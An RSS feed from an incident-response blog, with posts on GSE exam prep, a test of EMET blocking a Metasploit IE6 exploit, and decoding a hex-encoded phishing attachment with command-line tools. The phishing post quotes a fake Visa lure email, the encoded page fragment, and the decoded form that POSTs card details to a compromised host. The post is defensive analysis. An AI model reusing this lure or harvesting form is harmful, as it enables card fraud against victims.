<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Incident Response howto</title>
	<atom:link href="http://irhowto.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://irhowto.wordpress.com</link>
	<description>Getting IR done using some elbow grease</description>
	<lastBuildDate>Mon, 13 Feb 2012 17:19:08 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='irhowto.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Incident Response howto</title>
		<link>http://irhowto.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://irhowto.wordpress.com/osd.xml" title="Incident Response howto" />
	<atom:link rel='hub' href='http://irhowto.wordpress.com/?pushpress=hub'/>
		<item>
		<title>GSE Orlando 2012</title>
		<link>http://irhowto.wordpress.com/2012/02/13/gse-orlando-2012/</link>
		<comments>http://irhowto.wordpress.com/2012/02/13/gse-orlando-2012/#comments</comments>
		<pubDate>Mon, 13 Feb 2012 17:14:58 +0000</pubDate>
		<dc:creator>twsecblog</dc:creator>
				<category><![CDATA[SANS]]></category>
		<category><![CDATA[GSE]]></category>
		<category><![CDATA[GIAC]]></category>
		<category><![CDATA[2012]]></category>
		<category><![CDATA[Orlando]]></category>

		<guid isPermaLink="false">http://irhowto.wordpress.com/?p=656</guid>
		<description><![CDATA[I recently passed the GSE written portion. While I did not find any surprises on the test, I did think it was a bit harder then just a combination of the GSEC, GCIH and GCIA into one test. I&#8217;m starting my prep for the two day practical. I&#8217;m building my VM&#8217;s (Fedora Core 12, Backtrack 4) to setup a [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=irhowto.wordpress.com&amp;blog=7721318&amp;post=656&amp;subd=irhowto&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>I recently passed the <a href="http://www.giac.org/certification/security-expert-gse">GSE</a> written portion. While I did not find any surprises on the test, I did think it was a bit harder then just a combination of the GSEC, GCIH and GCIA into one test.</p>
<p>I&#8217;m starting my prep for the two day practical. I&#8217;m building my VM&#8217;s (Fedora Core 12, Backtrack 4) to setup a lab. My goal is to go through the each learning objective, review some labs from 503 and 504 and finish up with reviewing some of the<a href="http://www.amazon.com/Hackers-Challenge-Incident-Response-Scenarios/dp/0072193840"> Hacker Challenge</a> books.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/irhowto.wordpress.com/656/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/irhowto.wordpress.com/656/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/irhowto.wordpress.com/656/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/irhowto.wordpress.com/656/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/irhowto.wordpress.com/656/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/irhowto.wordpress.com/656/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/irhowto.wordpress.com/656/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/irhowto.wordpress.com/656/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/irhowto.wordpress.com/656/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/irhowto.wordpress.com/656/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/irhowto.wordpress.com/656/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/irhowto.wordpress.com/656/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/irhowto.wordpress.com/656/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/irhowto.wordpress.com/656/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=irhowto.wordpress.com&amp;blog=7721318&amp;post=656&amp;subd=irhowto&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://irhowto.wordpress.com/2012/02/13/gse-orlando-2012/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/4f9049053b0ab6163034109069576cb4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">twsecblog</media:title>
		</media:content>
	</item>
		<item>
		<title>EMET and MS12-004 Protection</title>
		<link>http://irhowto.wordpress.com/2012/01/27/emet-and-ms12-004-protection/</link>
		<comments>http://irhowto.wordpress.com/2012/01/27/emet-and-ms12-004-protection/#comments</comments>
		<pubDate>Fri, 27 Jan 2012 23:33:45 +0000</pubDate>
		<dc:creator>twsecblog</dc:creator>
				<category><![CDATA[malware]]></category>
		<category><![CDATA[Emet]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[MS12-004]]></category>

		<guid isPermaLink="false">http://irhowto.wordpress.com/?p=660</guid>
		<description><![CDATA[Metasploit added an exploit for MS12-004 today. Also, threat post has an article about attackers using this vulnerability. I decided to quickly test EMET against the Metasploit version, which is currently XP SP3 only. My XP SP3 test machine was running IE 6.0.2900.5512. With my config.xml from my previous posts, you have IE protected. When EMET [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=irhowto.wordpress.com&amp;blog=7721318&amp;post=660&amp;subd=irhowto&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Metasploit added an exploit for MS12-004 today. Also, threat post has an <a href="http://threatpost.com/en_us/blogs/attackers-targeting-windows-media-bug-malware-012712">article</a> about attackers using this vulnerability. I decided to quickly test EMET against the Metasploit version, which is currently XP SP3 only. My XP SP3 test machine was running IE 6.0.2900.5512.</p>
<p>With my <a href="http://dl.dropbox.com/u/31305232/Emet/config.xml">config.xm</a>l from my previous <a href="http://irhowto.wordpress.com/2011/05/27/emet-2-1-deployment/">posts</a>, you have IE protected. When EMET is enabled, IE crashes during the exploit preventing it from completing.  If you do not have EMET setup the exploit seem very reliable with IE6.</p>
<p>If you can not patch a system or there is a 0day out there, EMET will help protect against these types of attacks. It may be possible for attacker to bypass the protections that EMET gives you, but attackers do not seem interested at this point in implementing this level of sophistication.</p>
<p>If I get a chance to find the exploit mentioned in the threat post article I&#8217;ll be sure to also test it and update the post.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/irhowto.wordpress.com/660/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/irhowto.wordpress.com/660/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/irhowto.wordpress.com/660/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/irhowto.wordpress.com/660/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/irhowto.wordpress.com/660/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/irhowto.wordpress.com/660/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/irhowto.wordpress.com/660/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/irhowto.wordpress.com/660/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/irhowto.wordpress.com/660/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/irhowto.wordpress.com/660/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/irhowto.wordpress.com/660/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/irhowto.wordpress.com/660/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/irhowto.wordpress.com/660/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/irhowto.wordpress.com/660/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=irhowto.wordpress.com&amp;blog=7721318&amp;post=660&amp;subd=irhowto&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://irhowto.wordpress.com/2012/01/27/emet-and-ms12-004-protection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/4f9049053b0ab6163034109069576cb4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">twsecblog</media:title>
		</media:content>
	</item>
		<item>
		<title>Converting Hex encoded Javascript to Ascii via Commandline</title>
		<link>http://irhowto.wordpress.com/2012/01/12/converting-hex-encoded-javascript-to-ascii-via-commandline/</link>
		<comments>http://irhowto.wordpress.com/2012/01/12/converting-hex-encoded-javascript-to-ascii-via-commandline/#comments</comments>
		<pubDate>Thu, 12 Jan 2012 02:09:40 +0000</pubDate>
		<dc:creator>twsecblog</dc:creator>
				<category><![CDATA[Forensics]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[Hex]]></category>
		<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[Phishing]]></category>

		<guid isPermaLink="false">http://irhowto.wordpress.com/?p=611</guid>
		<description><![CDATA[We all get phishing emails quite often now a days. Therefore, I wanted to post a quick way to deobfuscate hex encoded javascript. Their are many ways to do this, but I wanted a quick way via command line. My goal, when preforming analysis on phishing emails, is to get the URL out of the code, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=irhowto.wordpress.com&amp;blog=7721318&amp;post=611&amp;subd=irhowto&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>We all get phishing emails quite often now a days. Therefore, I wanted to post a quick way to deobfuscate hex encoded javascript. Their are many ways to do this, but I wanted a quick way via command line.</p>
<p>My goal, when preforming analysis on phishing emails, is to get the URL out of the code, report it, and block it.</p>
<h3>Typical Phishing Email.</h3>
<p style="padding-left:60px;"><em>Dear Customer,</em></p>
<p style="padding-left:60px;"><em>For security reasons, your card was blocked.</em></p>
<p style="padding-left:60px;"><em>Following an abnormal activity, we saw that someone used the card without</em></p>
<p style="padding-left:60px;"><em>your permission, so to protect you, we blocked the card.</em></p>
<p style="padding-left:60px;"><em>Once you have reactivated your Visa Card records, your card service will</em></p>
<p style="padding-left:60px;"><em>not be interrupted and will continue as normal.</em></p>
<p style="padding-left:60px;"><em>To reactivate your Visa Card download and complete the form attached to</em></p>
<p style="padding-left:60px;"><em>this message.</em></p>
<p style="padding-left:60px;"><em>Note: Failure to verify your records will result in card suspension.</em></p>
<p style="padding-left:60px;"><em>Thank you.</em></p>
<p style="padding-left:60px;"><em>Visa will periodically send you information about site changes and</em></p>
<p style="padding-left:60px;"><em>enhancements.</em></p>
<p style="padding-left:60px;"><em>© Copyright 2001-2011 Visa. All Rights Reserved</em></p>
<p style="padding-left:60px;"><em>File attached to email </em></p>
<h2>Converting</h2>
<p>In this case, the file was an html attachment to the email. I saved the file and opened it in a text editor. If I had to follow a link to a phishing site, I would have downloaded the page using TOR and <a href="http://www.hermann-uwe.de/blog/howto-anonymous-communication-with-tor-some-hints-and-some-pitfalls">wget script.</a>.</p>
<p>The javascript below is simply hex encoded.</p>
<pre>script language="javascript"
document.write( unescape( '%09%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%3C%74%69%74%6C%65%3E%56%65%72%69%66%69%65%64%20%62%79%20%56%69%73%61%3C%2F%74%69%74%6C%65%3E%0A%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%69%73%6F%2D%38%38%35%39%2D%31%22%3E%0A%0A%20%20%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%63%73%73%2F%6E%75%65%76%6F%63%73%73%2E%63%73%73%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%0A%20%0A</pre>
<p>To convert it to ascii, remove everything up to the first single quote. The start of the file should begin with the %.  I did this using the linux cut command and saved the file as complete-document.htm</p>
<p><em><strong>#cat html.txt |cut -d &#8221; &#8216; &#8221; -f2  &gt;complete-document.htm</strong></em></p>
<pre>%09%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%3C%74%69%74%6C%65%3E%56%65%72%69%66%69%65%64%20%62%79%20%56%69%73%61%3C%2F%74%69%74%6C%65%3E%0A%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%69%73%6F%2D%38%38%35%39%2D%31%22%3E%0A%0A%20%20%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%63%73%73%2F%6E%75%65%76%6F%63%73%73%2E%63%73%73%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%0A%20%0A</pre>
<p>Now that we have just the hex encoded part of the html, we are going to use a bash tool xdd to convert it.<br />
<em><strong>#cat complete-document.htm |xxd -r -p |less</strong></em></p>
<pre>	Verified by Visa.. (truncated)...</pre>
<p>That is it as far as decoding the file, but that is just the start of your Incident response process.</p>
<h3>Analysis</h3>
<p>Within the decode, you should see either additional links for the victim to follow, or a web form that uses a POST to a website. In this case, you can grep for the words post and get to find out where this data is going.</p>
<p><strong><em>#cat complete-document.htm |cut -d &#8220;&#8216;&#8221; -f2 |xxd -r -p |egrep -i &#8216;post|get&#8217;</em></strong></p>
<pre>form name="run.php" action="http://compromised-host.com/imicommerce/images/music/sample/.m/q.php" method="POST" onSubmit="return OnMultiSubmitHandler(optinLang)</pre>
<p>Now that you have the URL, you will need to determine if any systems on your network sent information to the website. You should check logs from your:DNS Servers,Firewall, Network Flows, Web Proxy servers and any other network intelligence for connectivity to determine if any users accessed the site.</p>
<h2>Remediation</h2>
<ul>
<li>Any system that accessed the site my possibly have malware on it.</li>
<li>If the phish is targeting credentials, the user account should be locked and force to reset passwords.</li>
<li>If the user entered banking information they will need to notify the bank ASAP.</li>
</ul>
<p>Report the site as compromised to the whois information contact, the security contact of the organization the phishing email is targeting and add it to <a href="http://www.phishtank.com/">phishtank</a>.</p>
<h3>Prevention</h3>
<p>If you have a dns blacklist server  or  web proxy add the domain to the block list. Be careful if this site is part of a larger site as you will be blocking access to the entire domain.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/irhowto.wordpress.com/611/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/irhowto.wordpress.com/611/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/irhowto.wordpress.com/611/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/irhowto.wordpress.com/611/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/irhowto.wordpress.com/611/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/irhowto.wordpress.com/611/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/irhowto.wordpress.com/611/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/irhowto.wordpress.com/611/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/irhowto.wordpress.com/611/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/irhowto.wordpress.com/611/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/irhowto.wordpress.com/611/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/irhowto.wordpress.com/611/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/irhowto.wordpress.com/611/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/irhowto.wordpress.com/611/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=irhowto.wordpress.com&amp;blog=7721318&amp;post=611&amp;subd=irhowto&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://irhowto.wordpress.com/2012/01/12/converting-hex-encoded-javascript-to-ascii-via-commandline/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/4f9049053b0ab6163034109069576cb4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">twsecblog</media:title>
		</media:content>
	</item>
		<item>
		<title>Creating a log2timeline plugin</title>
		<link>http://irhowto.wordpress.com/2011/11/30/create-log2timeline-plugin/</link>
		<comments>http://irhowto.wordpress.com/2011/11/30/create-log2timeline-plugin/#comments</comments>
		<pubDate>Wed, 30 Nov 2011 23:08:26 +0000</pubDate>
		<dc:creator>twsecblog</dc:creator>
				<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Mac IR]]></category>
		<category><![CDATA[tools]]></category>
		<category><![CDATA[log2timeline]]></category>
		<category><![CDATA[perl]]></category>

		<guid isPermaLink="false">http://irhowto.wordpress.com/?p=623</guid>
		<description><![CDATA[I have a new post on the SANS forensics blog.  This post covers the process of creating a plugin for the log2timeline tool. Using a step-by-step instruction, I break down each section of the code and how it works. This should be used as a template for creating any plugin, but I cover how to [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=irhowto.wordpress.com&amp;blog=7721318&amp;post=623&amp;subd=irhowto&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>I have a new <a href="http://computer-forensics.sans.org/blog/2011/11/30/log2timeline-plugin-creation">post</a> on the SANS forensics blog.  This post covers the process of creating a plugin for the <a href="http://log2timeline.net/">log2timeline</a> tool. Using a step-by-step instruction, I break down each section of the code and how it works. This should be used as a template for creating any plugin, but I cover how to parse an OS X plist.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/irhowto.wordpress.com/623/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/irhowto.wordpress.com/623/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/irhowto.wordpress.com/623/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/irhowto.wordpress.com/623/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/irhowto.wordpress.com/623/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/irhowto.wordpress.com/623/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/irhowto.wordpress.com/623/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/irhowto.wordpress.com/623/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/irhowto.wordpress.com/623/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/irhowto.wordpress.com/623/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/irhowto.wordpress.com/623/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/irhowto.wordpress.com/623/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/irhowto.wordpress.com/623/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/irhowto.wordpress.com/623/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=irhowto.wordpress.com&amp;blog=7721318&amp;post=623&amp;subd=irhowto&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://irhowto.wordpress.com/2011/11/30/create-log2timeline-plugin/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/4f9049053b0ab6163034109069576cb4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">twsecblog</media:title>
		</media:content>
	</item>
		<item>
		<title>OSX Lion Window Preservation</title>
		<link>http://irhowto.wordpress.com/2011/10/04/lion-window-dat/</link>
		<comments>http://irhowto.wordpress.com/2011/10/04/lion-window-dat/#comments</comments>
		<pubDate>Tue, 04 Oct 2011 23:55:18 +0000</pubDate>
		<dc:creator>twsecblog</dc:creator>
				<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Mac IR]]></category>
		<category><![CDATA[10.7]]></category>
		<category><![CDATA[Artifacts]]></category>
		<category><![CDATA[LION]]></category>
		<category><![CDATA[OSX]]></category>
		<category><![CDATA[plist]]></category>

		<guid isPermaLink="false">http://irhowto.wordpress.com/?p=607</guid>
		<description><![CDATA[My first post on the SANS forensics blog is up!  The post covers a new feature in OSX 10.7 (Lion).  Lion saves the location of the windows and other data when the application closes. This additional data can be used to supplient your analysis. Mac is continuing to gain market share and we need to start taking [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=irhowto.wordpress.com&amp;blog=7721318&amp;post=607&amp;subd=irhowto&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>My first <a href="http://computer-forensics.sans.org/blog/2011/10/03/osx-lion-user-interface-preservation-analysis">post</a> on the SANS forensics blog is up!  The post covers a new feature in OSX 10.7 (Lion).  Lion saves the location of the windows and other data when the application closes. This additional data can be used to supplient your analysis. Mac is continuing to gain market share and we need to start taking a deeper look into this OS to get the most out of our investigations.</p>
<p>For more information about Mac incident response check out my previous <a href="https://irhowto.wordpress.com/2010/08/07/creating-a-os-x-live-ir-cd-rom/">post</a>.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/irhowto.wordpress.com/607/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/irhowto.wordpress.com/607/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/irhowto.wordpress.com/607/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/irhowto.wordpress.com/607/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/irhowto.wordpress.com/607/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/irhowto.wordpress.com/607/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/irhowto.wordpress.com/607/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/irhowto.wordpress.com/607/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/irhowto.wordpress.com/607/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/irhowto.wordpress.com/607/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/irhowto.wordpress.com/607/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/irhowto.wordpress.com/607/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/irhowto.wordpress.com/607/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/irhowto.wordpress.com/607/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=irhowto.wordpress.com&amp;blog=7721318&amp;post=607&amp;subd=irhowto&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://irhowto.wordpress.com/2011/10/04/lion-window-dat/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/4f9049053b0ab6163034109069576cb4?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">twsecblog</media:title>
		</media:content>
	</item>
	</channel>
</rss>
